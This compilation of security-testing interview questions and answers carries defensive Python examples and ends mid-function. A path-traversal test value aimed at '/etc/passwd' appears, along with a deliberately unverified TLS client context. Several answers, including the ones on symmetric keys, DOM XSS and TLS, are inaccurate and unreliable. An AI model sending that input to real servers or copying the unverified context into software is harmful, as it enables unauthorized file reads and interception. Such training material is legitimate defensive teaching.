
Q#1. What is security testing?

Ans. Security testing can be considered the most important of all types of software testing. Its main
objective is to find vulnerabilities in any software (web- or network-based) application and to protect its
data from possible attacks or intruders.
Many applications contain confidential data that needs to be protected from being leaked. Security
testing needs to be done periodically on such applications to identify threats and to take immediate
action on them.
Q#2. What is “vulnerability”?
Ans. A vulnerability can be defined as a weakness of any system through which intruders or bugs can
attack the system.
If security testing has not been performed rigorously on the system, the chances of vulnerabilities
increase. Patches or fixes are required from time to time to protect a system from vulnerabilities.
Q#3. What is the intrusion detection?
Ans. Intrusion detection is a system that helps in determining possible attacks and dealing with them.
Intrusion detection includes collecting information from many systems and sources, analysing that
information and finding out the possible ways of attack on the system.
Intrusion detection checks the following:
1. Possible attacks
2. Any abnormal activity
3. Auditing the system data
4. Analysis of different collected data etc.
Q#4. What is “sql injection”?
Ans. SQL injection is one of the common attacking techniques used by hackers to get at critical data.
Hackers check for any loophole in the system through which they can pass SQL queries that bypass
the security checks and return critical data. This is known as SQL injection. It can allow hackers to
steal critical data or even crash a system.
SQL injections are very critical and need to be avoided. Periodic security testing can prevent these kinds
of attacks. SQL database security needs to be defined correctly, and input boxes and special characters
should be handled properly.
Q#5. List the attributes of security testing?
Ans. The following are the seven attributes of security testing:
1. Authentication
2. Authorization
3. Confidentiality
4. Availability
5. Integrity
6. Non-repudiation
7. Resilience
Q#6. What is xss or cross site scripting?
Ans. XSS, or cross-site scripting, is a type of vulnerability that hackers use to attack web applications.
It allows hackers to inject HTML or JavaScript code into a web page, which can steal confidential
information from the cookies and return it to the hackers. It is one of the most critical and common
techniques and needs to be prevented.
Q#7. What is ssl connection and an ssl session?
Ans. An SSL (Secure Sockets Layer) connection is a transient peer-to-peer communications link; each
connection is associated with one SSL session.
An SSL session can be defined as an association between client and server, generally created by the
handshake protocol. It defines a set of parameters that may be shared by multiple SSL connections.
Q#8. What is “penetration testing”?
Ans. Penetration testing is a form of security testing that helps in identifying vulnerabilities in a system.
A penetration test is an attempt to evaluate the security of a system by manual or automated techniques;
if any vulnerability is found, testers use that vulnerability to get deeper access to the system and
find more vulnerabilities. The main purpose of this testing is to protect a system from any possible
attacks.
Penetration testing can be done in two ways: white box testing and black box testing.
In white box testing all the information is available to the testers, whereas in black box testing the testers
don't have any information and test the system in a real-world scenario to find the vulnerabilities.
Q#9. Why “penetration testing” is important?
Ans. Penetration testing is important because:
1. Security breaches and loopholes in systems can be very costly, as the threat of attack is always
present and hackers can steal important data or even crash the system.
2. It is impossible to protect all the information all the time. Hackers always come up with new
techniques to steal important data, so it is necessary for testers to perform the testing
periodically to detect possible attacks.
3. Penetration testing identifies the above-mentioned attacks, protects a system from them and helps
organizations keep their data safe.
Q#10. Name the two common techniques used to protect a password file?
Ans. Two common techniques to protect a password file are hashed passwords and a salt value, or
password file access control.
Q#11. List the full names of abbreviations related to software security?
Ans. Abbreviations related to software security are:
1. IPsec – Internet Protocol Security, a suite of protocols for securing internet communications
2. OSI – Open Systems Interconnection
3. ISDN – Integrated Services Digital Network
4. GOSIP – Government Open Systems Interconnection Profile
5. FTP – File Transfer Protocol
6. DBA – Dynamic Bandwidth Allocation
7. DDS – Digital Data System
8. DES – Data Encryption Standard
9. CHAP – Challenge Handshake Authentication Protocol
10. BONDING – Bandwidth On Demand Interoperability Group
11. SSH – Secure Shell
12. COPS – Common Open Policy Service
13. ISAKMP – Internet Security Association and Key Management Protocol
14. USM – User-based Security Model
15. TLS – Transport Layer Security
Q#12. What is iso 17799?
Ans. ISO/IEC 17799 was originally published in the UK and defines best practices for information security
management. It gives guidelines on information security for all organizations, small or big.
Q#13. List down some factors that can cause vulnerabilities?
Ans. Factors causing vulnerabilities are:
1. Design flaws – loopholes in the system's design can allow hackers to attack the system
easily.
2. Passwords – if passwords are known to hackers they can get the information very easily.
A password policy should be followed rigorously to minimize the risk of password theft.
3. Complexity – complex software can open the door to vulnerabilities.
4. Human error – human error is a significant source of security vulnerabilities.
5. Management – poor management of the data can lead to vulnerabilities in the system.
Q#14. List the various methodologies in security testing?
Ans. The methodologies are:
1. White Box – All the information is provided to the testers.
2. Black Box – No information is provided to the testers, and they test the system in a real-world
scenario.
3. Grey Box – The testers have partial information and have to work out the rest on their own.
Q#15. List down the seven main types of security testing as per the Open Source Security Testing
Methodology Manual?
Ans. The seven main types of security testing as per the Open Source Security Testing Methodology Manual
are:
1. Vulnerability Scanning: Automated software scans a system against known vulnerabilities.
2. Security Scanning: Manual or automated techniques to identify network and system weaknesses.
3. Penetration Testing: A form of security testing that helps in identifying vulnerabilities in a
system.
4. Risk Assessment: Analysis of the possible risks in the system. Risks are classified as Low,
Medium and High.
5. Security Auditing: Complete inspection of systems and applications to detect vulnerabilities.
6. Ethical Hacking: Hacking done on a system to detect flaws in it rather than for personal benefit.
7. Posture Assessment: This combines security scanning, ethical hacking and risk assessment to
show the overall security posture of an organization.
Q#16. What is SOAP and WSDL?
Ans. SOAP, or Simple Object Access Protocol, is an XML-based protocol through which applications
exchange information over HTTP. XML requests are sent by web services in SOAP format: a SOAP
client sends a SOAP message to the server, and the server responds with a SOAP message along
with the requested service.
Web Services Description Language (WSDL) is an XML-formatted language used by UDDI. "Web Services
Description Language describes web services and how to access them."
Q#17. List the parameters that define an SSL session connection?
Ans. The parameters that define an SSL session connection are:
1. Server and client random
2. Server write MAC secret
3. Client write MAC secret
4. Server write key
5. Client write key
6. Initialization vectors
7. Sequence numbers
Q#18. What is file enumeration?
Ans. This kind of attack uses forceful browsing together with URL manipulation. Hackers can
manipulate the parameters in the URL string and get critical data that is generally not open to the public,
such as archived data, old versions, or data that is still under development.
Q#19. List the benefits that can be provided by an intrusion detection system?
Ans. There are three benefits of an intrusion detection system.
1. NIDS or Network Intrusion Detection System
2. NNIDS or Network Node Intrusion Detection System
3. HIDS or Host Intrusion Detection System
Q#20. What is HIDS?
Ans. HIDS, or Host Intrusion Detection System, is a system in which a snapshot of the existing system is
taken and compared with the previous snapshot. It checks whether critical files were modified or deleted;
if so, an alert is generated and sent to the administrator.
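A minimal version of the snapshot-and-compare check described in Q#20, written in Python as an added example (it is not from the original document): a baseline of SHA-256 hashes for a set of monitored files is saved, a later snapshot is compared against it, and modified or deleted files produce alerts. The file names and contents in `demo()` are constructed for the demonstration.

```python
import hashlib
import json
import os
import tempfile


def hash_file(path):
    """SHA-256 of a file's contents, read in chunks so large files are handled."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(paths):
    """Map each monitored path to its hash, or None if the file is absent."""
    return {p: (hash_file(p) if os.path.isfile(p) else None) for p in paths}


def save_snapshot(snap, path):
    """Persist the baseline; in practice keep it where an intruder cannot rewrite it."""
    with open(path, "w") as f:
        json.dump(snap, f)


def load_snapshot(path):
    with open(path) as f:
        return json.load(f)


def compare_snapshots(previous, current):
    """Return (kind, path) alerts for every baseline file that was modified or deleted."""
    alerts = []
    for path, old_hash in previous.items():
        new_hash = current.get(path)
        if old_hash is not None and new_hash is None:
            alerts.append(("DELETED", path))
        elif old_hash != new_hash:
            alerts.append(("MODIFIED", path))
    return alerts


def demo():
    """Constructed scenario: baseline three files, then tamper with one and delete one."""
    with tempfile.TemporaryDirectory() as d:
        files = {
            os.path.join(d, "passwd"): "root:x:0:0:root:/root:/bin/sh\n",
            os.path.join(d, "sshd_config"): "PermitRootLogin no\n",
            os.path.join(d, "hosts"): "127.0.0.1 localhost\n",
        }
        for p, text in files.items():
            with open(p, "w") as f:
                f.write(text)
        baseline_path = os.path.join(d, "baseline.json")
        save_snapshot(snapshot(files), baseline_path)

        # Simulated tampering after the baseline was taken.
        with open(os.path.join(d, "sshd_config"), "a") as f:
            f.write("PermitRootLogin yes\n")
        os.remove(os.path.join(d, "hosts"))

        alerts = compare_snapshots(load_snapshot(baseline_path), snapshot(files))
        # Report only the file names so the result does not depend on the temp directory.
        return [(kind, os.path.basename(path)) for kind, path in alerts]


if __name__ == "__main__":
    for kind, name in demo():
        print(f"ALERT {kind}: {name}")
```

A real HIDS would also record ownership, permissions and new files, and would sign or export the baseline so that an intruder who can edit the monitored files cannot simply regenerate it.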
Q#21. List down the principal categories of SET participants?
Ans. The following are the participants:
1. Cardholder
2. Merchant
3. Issuer
4. Acquirer
5. Payment gateway
6. Certification authority
Q#22. Explain “URL manipulation”?
Ans. URL manipulation is a type of attack in which hackers manipulate the website URL to get critical
information. The information is passed in the query-string parameters via the HTTP GET method
between client and server. Hackers can alter the information in these parameters, get authenticated
on the servers and steal critical data.
To avoid this kind of attack, security testing for URL manipulation should be done. Testers
themselves can try to manipulate the URL and check for possible attacks, and if any are found they can
prevent these kinds of attacks.
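Added example (not from the original document) covering Q#18 and Q#22 from the defender's side: a handler that trusts the `id` query parameter beside one that checks ownership, and a path resolver that refuses to serve files outside the public document root or archived and backup copies of files. `INVOICES`, `PUBLIC_ROOT` and `DENIED_SUFFIXES` are constructed or assumed values.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Constructed sample records: invoice id -> owner and amount (not real data).
INVOICES = {
    "1001": {"owner": "alice", "amount": "120.00"},
    "1002": {"owner": "bob", "amount": "9.99"},
}

# Assumed document root for publicly served files.
PUBLIC_ROOT = "/srv/www/public"
# Assumed name patterns for archived, backup or in-development copies that must never be served.
DENIED_SUFFIXES = (".bak", ".old", ".orig", "~")


def invoice_id_from_url(url):
    return parse_qs(urlsplit(url).query).get("id", [""])[0]


def fetch_invoice_vulnerable(url, current_user):
    # BAD: whatever id appears in the query string is returned, regardless of who asks.
    return INVOICES.get(invoice_id_from_url(url))


def fetch_invoice_safe(url, current_user):
    # GOOD: the record is released only if it belongs to the authenticated user.
    record = INVOICES.get(invoice_id_from_url(url))
    if record is None or record["owner"] != current_user:
        return None  # answer 404 for both cases so the caller cannot tell whether the id exists
    return record


def resolve_public_path(requested):
    """Map a URL path onto PUBLIC_ROOT; refuse traversal and non-public file names."""
    candidate = posixpath.normpath(posixpath.join(PUBLIC_ROOT, requested.lstrip("/")))
    if posixpath.commonpath([PUBLIC_ROOT, candidate]) != PUBLIC_ROOT:
        return None  # escaped the document root (for example via ../)
    relative = posixpath.relpath(candidate, PUBLIC_ROOT)
    for part in relative.split("/"):
        if part.startswith(".") or part.endswith(DENIED_SUFFIXES):
            return None  # dotfiles/directories, backups and old versions are not public
    return candidate


if __name__ == "__main__":
    url = "https://shop.example/invoice?id=1002"
    print("vulnerable, asked by alice:", fetch_invoice_vulnerable(url, "alice"))
    print("safe, asked by alice:      ", fetch_invoice_safe(url, "alice"))
    print(resolve_public_path("/docs/index.html"), resolve_public_path("/../../etc/passwd"))
```

The point of the safe handler is that the id in the URL is treated as a hint, not as an authorization decision: the server re-derives who is allowed to see the record from the authenticated session.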
Q#23. What are the three classes of intruders?
Ans. The following are the three classes of intruders:
1. Masquerader: an individual who is not authorized on the computer but hacks the system's
access control and gains access to an authenticated user's account.
2. Misfeasor: a user who is authenticated to use the system resources but misuses that
access.
3. Clandestine user: an individual who hacks the system's control and bypasses the
system's security.
Q#24. List the component used in SSL?
Ans. The Secure Sockets Layer protocol, or SSL, is used to make a secure connection between client and
server computers. Below are the components used in SSL:
1. SSL Record Protocol
2. Handshake protocol
3. Change Cipher Spec
4. Encryption algorithms
Q#25. What is port scanning?
Ans. Ports are the points through which information goes in and out of any system. Scanning the ports to
find any loopholes in the system is known as port scanning. There can be some weak points in the
system that hackers can attack to get critical information. These points should be identified
and protected from any misuse.
The common types of port scan are:
1. Strobe: Scanning of known services.
2. UDP: Scanning of open UDP ports.
3. Vanilla: In this scan the scanner attempts to connect to all 65,535 ports.
4. Sweep: The scanner connects to the same port on more than one machine.
5. Fragmented packets: The scanner sends packet fragments that get through simple packet filters
in a firewall.
6. Stealth scan: The scanner blocks the scanned computer from recording the port scan activities.
7. FTP bounce: The scanner goes through an FTP server in order to disguise the source of the scan.
Q#26. What is a Cookie?
Ans. A cookie is a piece of information received from a web server and stored in a web browser, which can
be read at any time later. A cookie can contain password information or auto-fill information, and if
hackers get these details it can be dangerous.
Q#27. What are the types of Cookies?
Ans. Types of Cookies are:
- Session cookies – These cookies are temporary and last for that session only.
- Persistent cookies – These cookies are stored on the hard disk drive and last until they expire or are
manually removed.
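An added Python example (not from the original document) that builds a session cookie and a persistent cookie with the attributes a tester looks for, and audits a `Set-Cookie` value for missing `Secure`, `HttpOnly` and `SameSite`. Cookie names and values are constructed.

```python
from http.cookies import SimpleCookie


def _base_cookie(name, value):
    c = SimpleCookie()
    c[name] = value
    c[name]["path"] = "/"
    c[name]["secure"] = True      # only sent over HTTPS
    c[name]["httponly"] = True    # not readable by page scripts, so an XSS payload cannot read it
    c[name]["samesite"] = "Lax"   # not attached to most cross-site requests
    return c


def session_cookie_header(name, value):
    """Session cookie: no Expires/Max-Age, so the browser drops it when the session ends."""
    return _base_cookie(name, value)[name].OutputString()


def persistent_cookie_header(name, value, max_age_seconds):
    """Persistent cookie: written to disk and kept until Max-Age elapses or the user deletes it."""
    c = _base_cookie(name, value)
    c[name]["max-age"] = max_age_seconds
    return c[name].OutputString()


def audit_set_cookie(header_value):
    """Return findings for one Set-Cookie value; an empty list means the attributes look right."""
    c = SimpleCookie()
    c.load(header_value)
    findings = []
    for name, morsel in c.items():
        kind = "persistent" if (morsel["max-age"] or morsel["expires"]) else "session"
        if not morsel["secure"]:
            findings.append(f"{name} ({kind}): missing Secure")
        if not morsel["httponly"]:
            findings.append(f"{name} ({kind}): missing HttpOnly")
        if not morsel["samesite"]:
            findings.append(f"{name} ({kind}): missing SameSite")
    return findings


if __name__ == "__main__":
    print(session_cookie_header("sid", "abc123"))
    print(persistent_cookie_header("prefs", "dark", 86400))
    print(audit_set_cookie("sid=abc123; Path=/"))
```

When testing a site, the same audit is applied to every `Set-Cookie` header in the responses; a session identifier that is persistent, or that lacks `Secure` and `HttpOnly`, is the kind of finding the answer above is warning about.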

Q#28. What is a honeypot?
Ans. A honeypot is a fake computer system that behaves like a real system and attracts hackers to attack
it. Honeypots are used to find loopholes in the system and to provide solutions for these kinds of
attacks.
Q#29. List the parameters that define an SSL session state?
Ans. The parameters that define an SSL session state are:
1. Session identifier
2. Peer certificate
3. Compression method
4. Cipher spec
5. Master secret
6. Is resumable
Q#30. Describe Network Intrusion Detection system?
Ans. A Network Intrusion Detection System is generally known as NIDS. It is used to analyse the traffic
passing over the entire subnet and to match it against known attacks. If any loophole is identified, the
administrator receives an alert.

1. Explain what cross-site scripting (XSS) is all about.


This is a type of cyber-attack where malicious pieces of code, or even scripts, can be covertly injected
into trusted websites. These kinds of attacks typically occur when the attacker uses a vulnerable
Web-based application to insert the malicious lines of code. This can occur on the client side or the browser
side of the application. As a result, when an unsuspecting victim runs this particular application, their
computer is infected and can be used to access sensitive information and data. A perfect example of this
is the contact form, which is used on many websites. The output that is created when the end user
submits their information is often neither encoded nor encrypted.
2. What exactly is data packet sniffing, and what are some of the most widely used tools?
Data packet sniffing is a specific process in which network traffic can be captured either across the entire
IT infrastructure, or just certain parts of it. Once this has been accomplished, a deep analysis of the
data packets in question can then be made.
For example, if a business or a corporation is hit by a cyber-attack, examining the network traffic and the
data packets that were associated with it at the time the security breach occurred becomes extremely
crucial, especially from the standpoint of forensics. Even if no attack is imminent, it is still very crucial for
the IT staff to conduct a check on their network traffic in order to determine if there is any sort of
anomaly present. There are many data packet sniffing tools available today, but probably
the most widely used one is Wireshark.
3. Please provide the exact names of the following abbreviations that are commonly used in
pentesting: 2FA, 2S2D, 2VPCP, 3DES, 3DESE, 3DESEP.
The acronyms stand for the following:
- 2FA means "Two-Factor Authentication"
- 2S2D means "Double-Sided, Double Density"
- 2VPCP means "Two-Version Priority Ceiling Protocol"
- 3DES means "Triple Data Encryption Standard"
- 3DESE means "Triple Data Encryption Standard Encryption"
- 3DESEP means "Triple Data Encryption Standard Encryption Protocol"
4. What are some of the most common network security vulnerabilities that a pentester
comes across?
Of course, there are countless issues that can impact the network infrastructure of an
organization, and you probably have your own stories about what you've encountered. The following
vulnerabilities are some of the most prevalent:
- The usage of extremely weak passwords in the network security tools themselves, which
include the routers, firewalls, network intrusion devices and so on. Very often, business entities
are in a rush to deploy these kinds of technologies, and they forget to create a robust and secure
password. This leads to them using the insecure default one set up by the vendor
- Implementing security patches on the wrong servers and related network components.
There are also times when a security patch is installed on the right machine but not configured
properly, thus leaving it wide open to a cyber-attack
- The misconfiguration of network devices, as described previously
- The use of infected portable media devices (primarily USB drives) and inserting them into a
server and other related network components
- The lack of a coherent network security policy; even if one was implemented, compliance is
still a huge issue
5. What are the different pentesting techniques?
Pentesting techniques fall into the following categories:
- Web Application Testing
- Wireless Network/Wireless Device Testing
- Network Infrastructure Services
- Social Engineering Testing
- Client-Side Application Testing
6. What network ports are commonly examined in a pentesting exercise, and what tool can
be used for this?
They are as follows:
- HTTPS (Port #443)
- FTP (Port #'s 20 & 21)
- NTP (Port #123)
- SSH (Port #22)
- HTTP (Port #80)
- Telnet (Port #23)
- SMTP (Port #25)
In these particular instances, "Nmap" is the most commonly used tool.
7. Describe in detail what SQL injection is.
This is a method in which malicious SQL code is inserted into the database or the back end of the Web-
based application. These are typically deployed into an entry-level field so that the malicious code can be
executed. This kind of attack is used primarily for heavy data-driven applications in which multiple
security vulnerabilities can be found and exploited. It should be noted that although SQL injection
attacks are primarily used to hit Web-based applications, the attacker can also target the SQL database
just by itself as well.
8. What is the primary difference between asymmetric and symmetric cryptography? Give an
example of the former.
Only one type of key is used in symmetric cryptography, and this key is known as the Private Key.
Although the main advantage of this is that this type of system is relatively easy to deploy, the primary
disadvantage of it is that if the Private Key falls outside the reach of the sending and receiving parties,
the cyber-attacker can easily capture the ciphertext and decrypt it very easily.
With asymmetric cryptography, two keys are used: the Public Key and the Private Key. The advantage of
this system is that it offers far greater levels of security as opposed to just using a Private Key, but it
requires considerably more processing power resources. An example of an asymmetric cryptography
system is Public Key Infrastructure, also known as PKI.
9. What are the permutations required for a robust SSL connection to take place?
The following characteristics are required:
- The session identifier
- A peer certificate
- An established compression method
- Any associated cipher specs
10. What are SSL and TLS?
SSL stands for "Secure Sockets Layer." This is the de facto standard to keep all Internet connections safe
and secure. You will know that a particular website can be safely accessed when it has "HTTPS" in its URL
address. SSL is used most in e-commerce-based applications, in which credit card and other personal
information and data is transmitted to the online merchant.
TLS stands for "Transport Layer Security" and is actually a much more updated and advanced version of
SSL. It is important to note that TLS can come with three types of encryption:
- Elliptic Curve Cryptography (ECC)
- Rivest–Shamir–Adleman (RSA)
- Digital Signature Algorithm (DSA)
Level 3 Questions
This section covers advanced-level questions about penetration testing, focusing on the following:
- The SSL/TLS handshake
- The phases of a network intrusion attack
- Diffie-Hellman public key exchanges
- The establishment of network controls
- Traceroute/Tracert
- Omniquad BorderSecure
- The various pentesting models
- The types of cross-site scripting (XSS)
- Cross-site request forgery
1. How exactly does SSL/TSL work?
Establishing an SSL/TLS connection works in this fashion:
- On the client side, the end user enters a URL address into their Web browser. This then
initiates the SSL/TLS connection by transmitting a particular message to the server on which the
website resides
- This server then returns a Public Key (or even a certificate) back to the end user's Web
browser
- The browser then closely inspects this Public Key, and if all looks good, a Symmetric Key is
transmitted back to the server. If there are anomalies detected within the Public Key, the
communications are instantly cut off
- Once the server gets the Symmetric Key, it then sends the encrypted webpage that is being
requested back to the end user's Web browser
- The browser then decrypts the content into a form that can be easily understood by the end
user
It is important to note that this entire process can also be referred to as the SSL/TLS Handshake.
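The handshake steps above hinge on the client actually inspecting the server's certificate before it sends anything secret. This added Python example (not from the original document) contrasts a client context that skips that inspection with a hardened one, and audits a context for the missing checks. `fetch_peer_certificate` shows where the checks take effect but is not run here because it needs a network connection; the host name passed to it is whatever the caller supplies.

```python
import socket
import ssl


def insecure_client_context():
    """Weak configuration: the server's certificate is never checked, so anyone on the path
    can present their own key and read or alter the traffic."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can be relaxed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context():
    """Hardened configuration: system CA store, certificate and hostname checks, TLS 1.2 or later."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED + check_hostname + default CAs
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx):
    """Return findings describing what the context fails to verify."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate is not verified")
    if not ctx.check_hostname:
        findings.append("certificate is not matched against the hostname")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("TLS versions below 1.2 are accepted")
    return findings


def fetch_peer_certificate(host, port=443, ctx=None):
    """Complete the handshake with a server and return the negotiated version and the
    certificate subject. If verification fails, wrap_socket raises and the connection is
    cut off, which is the 'anomalies detected' branch of the handshake description."""
    ctx = ctx or hardened_client_context()
    with socket.create_connection((host, port), timeout=10) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            return tls.version(), tls.getpeercert()["subject"]


if __name__ == "__main__":
    print("insecure:", audit_context(insecure_client_context()))
    print("hardened:", audit_context(hardened_client_context()))
```

`verify_mode = CERT_NONE` and `check_hostname = False` are the two settings that most often appear in application code when a developer "fixes" a certificate error; the audit function is the kind of check a code reviewer or a test would apply to every TLS context the application creates.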
2. Describe the different phases of a network intrusion attack.
The phases are as follows:
- Reconnaissance: This is where the pentester learns more about the target they are about to
hit. This can be done on either an active or a passive basis. In this step, you learn more about the
following:
  - The IP address range that the target is in
  - Its domain name
  - DNS records
- Scanning: This is the step where the pentester learns about the vulnerabilities of
the particular target. Weaknesses are found in the network infrastructure and the
associated software applications. For example, this includes the following:
  - Ascertaining the services that are currently being run
  - Any open ports
  - The detection of any firewalls
  - Weaknesses of the operating system in question
- Gaining the needed access: This is the part where the pentester starts to actually initiate the
launch of the cyber-attack, based on the weaknesses and the vulnerabilities that they have
discovered in the last step
- Maintaining the access: The pentester has entered the target itself and tries to keep that
access point open so that they can extract as much private information and data as possible
- Covering their tracks: In this last step, the pentester ensures that any "footprints" left
behind in the course of their attack are covered up so that they can't be detected. For instance,
this involves the following:
  - The deletion of any log-related files
  - Closing off any backdoors
  - Hiding all controls that may have been used
3. What is a specific pentesting exercise that can be done with a Diffie-Hellman exchange?
This was actually one of the first Public Key protocols to be put into place, and it is a methodology that
can be utilized to securely exchange Public Keys over an open network line of communications. A pentest
can be done here in order to determine and ascertain any kind of weak SSL/TLS services that are associated
with this exchange process.
4. After a pentest is conducted, what are some of the top network controls you would advise
your client to implement?
The following types of controls should be implemented:
- Only use those applications and software tools that are deemed "whitelisted"
- Always implement a regular firmware upgrade and software patching schedule, and make
sure that your IT staff sticks with the prescribed timetable
- With regard to the last point, it is absolutely imperative that the operating system(s) you
utilize are thoroughly patched and upgraded
- Establish a protocol for giving out administrative privileges only on an as-needed basis, and
only to those individuals that absolutely require them
5. How exactly does traceroute/tracert work?
This is used to determine exactly the route the data packets are taking. For example, this
method can be used to ascertain whether data packets are being maliciously redirected or are taking too
long to reach their destination, as well as the number of hops it takes for the data packets to go from the
point of origination to the point of destination.
6. What is Omniquad BorderSecure?
This is a type of specific service that can help to perform network-based audits or even automated
pentesting of an entire network infrastructure. It can give the pentesting team detailed information and
data as to how the cyber-attacker can gain access to your network-based digital assets. It can also be
used to help mitigate any form of threat that is launched by a malicious third party.
7. What number of vulnerabilities can the abovementioned service actually detect?
All types of network infrastructures can be pentested, and up to a thousand total vulnerabilities can be
detected with this particular service.
8. Describe the theoretical constructs of a threat model that can be used in a pentesting
exercise.
The constructs behind a threat model include the following:
- Gathering the required documentation
- Correctly identifying and categorizing the digital assets that are found within the IT
infrastructure of a corporation or business
- Correctly identifying and categorizing any kind of cyber-threat that can be targeted
towards the digital assets
- Properly correlating the digital assets with the cyber-threats that they are prone to (this can
also be considered a mapping exercise where a digital asset is associated with its specific
cyber-threat)
It is also important to note that there are three types of threat models that a pentesting team can use,
and they are as follows:
- Digital Asset-Centric
- Cyber-Attacker-Centric
- Software Application-Centric
The above is an example of a Digital Asset-Centric Threat Model.
9. What are the three types of cross-site scripting (XSS)?
The three types are as follows:
- Persistent/Stored XSS: This is where the malicious input is stored on the target server,
such as in a database, and is reflected at the page where the end user entered their information
(such as a "Contact Us" form)
- Reflected XSS: Any form of malicious user input is instantaneously returned by the Web-based
application as an "Error Message." As a result, this data is deemed to be unsafe by the
Web browser, and it is not stored in any fashion
- DOM-based XSS: This allows any type or kind of client scripting language (such as
Java) to access and maliciously modify the end user input. It can also covertly alter the content,
structure and even the particular style of a webpage. The types of objects that can be
manipulated include the following:
  - Document.URL
  - Document.location
  - Document.referrer
10. What exactly is CSRF and how can it be prevented when executing a pentest exercise?
This stands for cross-site request forgery, and it takes advantage of the trust levels that are established in
an authenticated user session. For example, in these scenarios, Web-based applications typically do not
conduct any form of verification that a specific request actually came from an authenticated user;
rather, the only form of verification is sent by the particular Web browser that the end user is utilizing.
There are two ways to avoid this scenario:
- Double-check the specific CSRF token that is being used
- Confirm that the specific requests are coming from within the same origin
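Both defences listed above, as an added Python example (not from the original document): a per-session token stored server-side and compared in constant time, and an Origin/Referer check against the application's own origin. `SITE_ORIGIN`, the session dict and the header and form dicts are assumed stand-ins for a real framework's objects.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the application itself.
SITE_ORIGIN = "https://app.example"


def issue_csrf_token(session):
    """Generate an unguessable per-session token and store it server-side. The page embeds
    it in a hidden form field; a forged cross-site request cannot know it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def token_matches(session, form):
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False
    # Constant-time comparison so response timing does not leak how many characters matched.
    return hmac.compare_digest(expected.encode(), supplied.encode())


def request_origin(headers):
    """Derive the requesting origin from Origin, falling back to Referer; None if neither is present."""
    if headers.get("Origin"):
        return headers["Origin"]
    referer = headers.get("Referer")
    if not referer:
        return None
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}"


def validate_state_changing_request(session, headers, form):
    """Apply both checks from the answer above: the token first, then the origin."""
    if not token_matches(session, form):
        return False, "missing or mismatched CSRF token"
    if request_origin(headers) != SITE_ORIGIN:
        return False, "request does not come from the application's own origin"
    return True, "ok"


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    good = {"Origin": "https://app.example"}
    print(validate_state_changing_request(session, good, {"csrf_token": token}))
    print(validate_state_changing_request(session, {"Origin": "https://evil.example"}, {"csrf_token": token}))
    print(validate_state_changing_request(session, good, {}))
```

A request with neither `Origin` nor `Referer` fails the origin check here; that is the conservative choice for state-changing requests, since browsers send `Origin` on cross-origin POSTs and a missing header usually means the request did not come from a normal page load.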

1) Explain the Security Testing.


The security testing process is used to identify or detect flaws in the security mechanism of an
information system. An information system basically protects data and maintains functionality as per
user expectation and requirement.

Security testing is one of the most important types of testing for any application. In
this type of testing the tester plays the role of the attacker and works through the application to find
the bugs in the system. Security testing is considered one of the most important types of testing among all
the types of testing available today.

Q2). What is the objective of Security Testing?


Security testing is one of the most important types of testing, and its objective is to find bugs or
vulnerabilities in the software, whether a desktop or a web-based application. It is done to protect the
data from an unexpected attack or intruder.

Many applications contain confidential data that may require protection. Testing must be done periodically in
order to identify threats so that immediate action can be taken if an attack is in progress.

Q3). Define Vulnerability.


The weakness of any system through which any bug or intruder can attack the system is known as its
vulnerability. If testing is not performed rigorously on the system, the chances of attack increase. To
avoid such attacks, patches and fixes are applied from time to time to protect the system from any
unpredicted vulnerability.

Q4). Explain intrusion detection.


An intrusion detection system detects the possibility of an attack and many times deals with it as
well. Basically, it collects information from a number of sources, analyses the information and finds
out all possible ways to attack the system. It checks for the following:

- Attack possibility
- Abnormal activity detection
- System data auditing
- Data collection analysis
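The information collection and analysis step is what an IDS actually does with the data it gathers. As an added Python example (not from the original document) in the spirit of Q#3, Q#30 and Q4 above, here is a small detector that parses SSH authentication log lines and raises an alert when one source address fails to log in repeatedly within a short window. The log lines, user names and addresses are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (made up for this example; the addresses are from
# documentation ranges, not real hosts).
SAMPLE_LOG = """\
2024-03-01T10:00:01 sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51000
2024-03-01T10:00:03 sshd[1202]: Failed password for root from 203.0.113.7 port 51001
2024-03-01T10:00:04 sshd[1203]: Failed password for root from 203.0.113.7 port 51002
2024-03-01T10:00:06 sshd[1204]: Failed password for root from 203.0.113.7 port 51003
2024-03-01T10:00:07 sshd[1205]: Failed password for root from 203.0.113.7 port 51004
2024-03-01T10:00:09 sshd[1206]: Accepted password for alice from 198.51.100.20 port 40000
2024-03-01T10:30:00 sshd[1300]: Failed password for bob from 198.51.100.20 port 40001
2024-03-01T11:30:00 sshd[1400]: Failed password for bob from 198.51.100.20 port 40002
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def parse_line(line):
    """Turn one log line into an event dict, or None if the line is not an auth event."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "result": m["result"],
            "user": m["user"], "ip": m["ip"]}


def detect_brute_force(log_text, threshold=5, window_seconds=60):
    """Alert on any source IP with at least `threshold` failed logins inside a sliding window."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(list)
    for line in log_text.splitlines():
        event = parse_line(line)
        if event and event["result"] == "Failed":
            failures[event["ip"]].append(event["ts"])

    alerts = []
    for ip, times in failures.items():
        times.sort()
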